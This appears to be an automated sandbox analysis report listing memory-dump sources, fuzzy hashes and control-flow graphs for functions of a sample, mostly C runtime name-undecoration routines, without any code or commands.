                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                            • Instruction ID: c9224ba65e095af6fcc1edc17683d2a41bf8ef912abd36c19c5c1d069650e642
                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                            • Instruction Fuzzy Hash: 20C16F73D4F5F2098B36852D08182BEEE726E92B4531FD3A5DCD03F28AC2266D8596D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                            • Instruction ID: 335cd5d4267493d1c415e70678e78a63b3a4f5546b1a54781b686270044df6be
                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                            • Instruction Fuzzy Hash: 92C17073D4F5F2058B36852D08182BEEE726E92B4531FD3B5CCD03F28AC2266E8596D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                            • String ID:
                                                            • API String ID: 3471368781-0
                                                            • Opcode ID: 63958043b1502c816c5dfa838cdcc4df346477d89bcfdaf2bd9e67508add1089
                                                            • Instruction ID: 62f76b5c18938632fcbc2903faf7bd5712988f0f19f32277a7baf9f280a51021
                                                            • Opcode Fuzzy Hash: 63958043b1502c816c5dfa838cdcc4df346477d89bcfdaf2bd9e67508add1089
                                                            • Instruction Fuzzy Hash: 86B1C3755007458BDB389F25CC92AB6B3A9FF4431CF19452FE98386780EB75E9858B30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                            • Instruction ID: 263eafd3f7e6fe57d9dcf04e56e0a5c684fd77f9be19734935f572dce25d2379
                                                            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                            • Instruction Fuzzy Hash: 73B17173E4B5F2058B36852D04582BEEE726E92B4431FD3B5DCD03F28AC226AD85D6D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
                                                            • Instruction ID: 52c6a520a316de25eb5e37a932db88187fd53cbe3e652c2f3956ef52ec0261a7
                                                            • Opcode Fuzzy Hash: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
                                                            • Instruction Fuzzy Hash: A721DD21670AE306CB854FF8FCC011267D1CBCD21F76ED279CE94C91A6D47DE6628590
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7fd161ad71b083437cb9e7b5467f0ba713d648eb94ba202ec0c01540f5fd4838
                                                            • Instruction ID: b2060b4bb68e182e9c656f4ae656b0179fde7214c284f3a90ad00fd7c23de87f
                                                            • Opcode Fuzzy Hash: 7fd161ad71b083437cb9e7b5467f0ba713d648eb94ba202ec0c01540f5fd4838
                                                            • Instruction Fuzzy Hash: 1C215FB5D0020A8FCB54DFA9D4816EEFBF4BB48320F54846ACA56F3350E634AA45CF94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                            • Instruction ID: 0bad2ea208cbf96ef6d8d4aba50b352316f3b12938f2527417e53e0da8eed8a1
                                                            • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                            • Instruction Fuzzy Hash: 36F08232900140EBCF11DF16D804EAAF7B9EB43361F253054E449B3200C330ED00EAB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
                                                            • Instruction ID: b7cee9ea7715125c2749a3f41284be7f8e3e241f121c92891ecf5f21aac9d688
                                                            • Opcode Fuzzy Hash: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
                                                            • Instruction Fuzzy Hash: 3EE08C32921238EBCB14DB9CC90498AF3ECEB44B00B194497B501D3210C270DE00C7E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                            • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                            • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                            • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2972b38be2329f416addca4e19eb95bf4d48cf5cbabcaeda9ee0f16989914622
                                                            • Instruction ID: 910dffb1161e2b370b2c3a4e945ee330026209258e345006e9725abcf26f2aa7
                                                            • Opcode Fuzzy Hash: 2972b38be2329f416addca4e19eb95bf4d48cf5cbabcaeda9ee0f16989914622
                                                            • Instruction Fuzzy Hash: F1D0923A6019109FC210CF09E480941F7B4FB996307164066E904A3720C334FC42CAD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
                                                            • Instruction ID: 28f5a0049cf8f4a49f2adafbabbd1c12532ecc68f55ddaeecc556ef76be351f7
                                                            • Opcode Fuzzy Hash: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
                                                            • Instruction Fuzzy Hash: 97C08C34400A00C6CE398A2482713A4335DEBE2782FA804CEDC1A0B742C51EDC82DA31
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                            • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                            • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                            • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                            • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                            • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                            • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 388 e0f54e-e0f55f 389 e0f561-e0f575 call e0c678 388->389 390 e0f576-e0f579 388->390 392 e0f580-e0f583 390->392 393 e0f57b-e0f57e 390->393 395 e0f598-e0f5a8 392->395 396 e0f585-e0f597 392->396 393->392 393->395 397 e0f5aa-e0f5ae 395->397 398 e0f5de-e0f5e0 395->398 399 e0f5b0-e0f5bf 397->399 400 e0f5c6-e0f5d9 call e0c678 397->400 401 e0f5e2 398->401 402 e0f5e7 398->402 399->402 403 e0f5c1-e0f5c4 399->403 410 e0f92a-e0f92c 400->410 405 e0f5e5 401->405 406 e0f5ea-e0f5ed 402->406 403->405 405->402 405->406 408 e0f605-e0f625 406->408 409 e0f5ef-e0f600 406->409 411 e0f703-e0f706 408->411 412 e0f62b-e0f65b call e0bfb4 call e0c3fc 408->412 409->410 413 e0f7b6-e0f7c1 411->413 414 e0f70c-e0f71b 411->414 431 e0f6a0-e0f6bf call e0bbc2 call e0c3fc 412->431 432 e0f65d-e0f69e call e0f297 call e0bf87 call e0c3fc call e0c1dd 412->432 416 e0f7c3-e0f7e7 call e0c2e9 call e0c3fc 413->416 417 e0f7e9-e0f7f7 call e0c2e9 call e0b7a5 413->417 418 e0f721-e0f761 call e0e2d3 call e0bf87 call e0c3fc call e0c1dd 414->418 419 e0f7a7-e0f7b1 call e0e2d3 call e0b7a5 414->419 439 e0f7fc-e0f800 416->439 417->439 418->413 419->413 461 e0f6c2-e0f6ce 431->461 432->461 443 e0f802-e0f83a call e0bf87 call e0c3fc call e0c444 439->443 444 e0f83d-e0f84c call e0b60d 439->444 443->444 457 e0f85e 444->457 458 e0f84e-e0f85c 444->458 465 e0f860-e0f8b8 call e0be7e call e0c93a call e0bf87 call e0c3fc call e0c444 call e0c1dd 457->465 458->465 463 e0f6d4-e0f6d6 461->463 464 e0f78a-e0f7a2 call e0bbc2 call e0c3fc 461->464 468 e0f774-e0f785 463->468 469 e0f6dc-e0f6f0 463->469 490 e0f925 464->490 500 e0f8ca-e0f8da 465->500 501 e0f8ba-e0f8bc 465->501 477 e0f928-e0f929 468->477 475 e0f6f2-e0f700 call e0bae7 469->475 476 e0f763-e0f772 call e0bae7 call e0b7a5 469->476 475->411 476->411 477->410 490->477 503 e0f8dc-e0f8eb call e0ca1a call e0c1dd 500->503 504 e0f8ed-e0f8f7 call e0ca1a call e0b7a5 500->504 501->500 502 e0f8be-e0f8c5 call e0c1dd 501->502 502->500 512 e0f8fc-e0f8fe 503->512 504->512 514 e0f900-e0f919 512->514 515 e0f91b-e0f920 call e0bbc2 512->515 514->477 515->490
                                                            APIs
                                                            • operator+.LIBCMT ref: 00E0F569
                                                              • Part of subcall function 00E0C678: DName::DName.LIBCMT ref: 00E0C68B
                                                              • Part of subcall function 00E0C678: DName::operator+.LIBCMT ref: 00E0C692
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: NameName::Name::operator+operator+
                                                            • String ID:
                                                            • API String ID: 2937105810-0
                                                            • Opcode ID: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
                                                            • Instruction ID: 397d67e5b3b2eb9a033b2b6136596fe0702e9536c48e5e4a041af19d35d90c4c
                                                            • Opcode Fuzzy Hash: 2d53c3902569e9784ef8fb12d3ca9c9f454977bad3efebfb259204c3ad6fcad2
                                                            • Instruction Fuzzy Hash: D9D12D71900209AFDB14EFA8D895AEEBBF4BF08304F14516AE505F72D1EB349A85CB61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 517 e10296-e102aa 518 e102b0-e102d1 517->518 519 e1061c-e10629 call e0c678 517->519 520 e102d3 518->520 521 e10325-e10328 518->521 531 e1062c 519->531 523 e10506-e1050e call e0c496 520->523 524 e102d9-e102df 520->524 526 e104f9-e10501 call e0c2b4 521->526 527 e1032e 521->527 534 e10513-e10516 523->534 529 e104f1-e104f4 524->529 530 e102e5 524->530 526->523 527->529 532 e10334-e10337 527->532 538 e1042e-e10448 call e0e179 529->538 530->521 535 e1062f-e10633 531->535 536 e104ea-e104ef 532->536 537 e1033d-e10340 532->537 539 e10473-e1048b 534->539 540 e1051c-e10521 534->540 536->534 542 e10346-e10349 537->542 543 e104db 537->543 538->540 558 e1044e-e10456 538->558 544 e10491-e104b5 call e1000b 539->544 545 e105c5-e105c8 539->545 549 e10563-e1056b 540->549 550 e10523-e10528 540->550 542->529 548 e1034f-e10365 542->548 546 e104e0-e104e8 call e0c2b4 543->546 577 e104c4-e104cf 544->577 578 e104b7-e104bf call e0c496 544->578 555 e10602-e1061a call e1000b 545->555 556 e105ca-e105cd 545->556 546->540 559 e1040b-e1040e 548->559 560 e1036b-e1036e 548->560 553 e10570-e10588 call e0bfb4 call e0c3fc 549->553 551 e10554-e10561 550->551 552 e1052a-e1052c 550->552 551->553 552->551 561 e1052e-e10530 552->561 599 e1058b-e10591 553->599 555->531 566 e105f0-e105f3 556->566 567 e105cf-e105df call e0c2b4 556->567 558->535 564 e104d4-e104d9 559->564 565 e10414-e10417 559->565 570 e10401-e10406 560->570 571 e10374-e10377 560->571 561->551 575 e10532-e10534 561->575 564->546 579 e10470-e10472 565->579 580 e10419-e1041c 565->580 566->555 572 e105f5-e105fd call e0c2b4 566->572 567->555 603 e105e1-e105ee call e0c496 567->603 570->546 573 e10379-e1037c 571->573 574 e103de-e103e1 571->574 572->555 584 e103d4-e103d9 573->584 585 e1037e-e10380 573->585 593 e103e3-e103e6 574->593 594 e1045b-e10460 574->594 575->551 586 e10536-e10539 575->586 590 e105c0-e105c3 577->590 578->577 579->539 588 e10469-e1046e 580->588 589 e1041e-e10421 580->589 584->546 597 e10382-e10385 585->597 598 e103bf-e103cf call e0bcfb 585->598 586->599 600 e1053b-e10542 586->600 588->546 601 e10423-e10429 589->601 602 e10462-e10467 589->602 590->535 595 e103f7-e103fc 593->595 596 e103e8-e103eb 593->596 594->546 595->546 596->594 607 e103ed-e103f2 596->607 608 e10387-e1038d 597->608 609 e1039d-e103ba call e10296 call e0c69c 597->609 598->540 605 e10593-e105b0 call e0bf87 call e0c3fc call e0c1dd 599->605 606 e105b5-e105bd 599->606 600->551 610 e10544-e10546 600->610 601->594 611 e1042b 601->611 602->546 603->555 605->606 606->590 607->546 608->594 615 e10393-e10398 608->615 609->531 610->551 617 e10548-e1054a 610->617 611->538 615->546 617->551 622 e1054c-e1054e 617->622 622->551 625 e10550-e10552 622->625 625->551 625->599
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
                                                            • String ID:
                                                            • API String ID: 1129569759-0
                                                            • Opcode ID: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
                                                            • Instruction ID: 769bf0475fedb9ec8ea4c64511b3e93fc088ccb15ab1ffc7cc7bb5a2b2cb0918
                                                            • Opcode Fuzzy Hash: 30b1e72d88142c82e2d5552c373b89b4dacb89b85ea205a481f88f5b85183262
                                                            • Instruction Fuzzy Hash: AD91D4B1900209AFCF24DF58C886AFD7BB5AF08315F64A156F621F6192D7B49BC0CB54

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
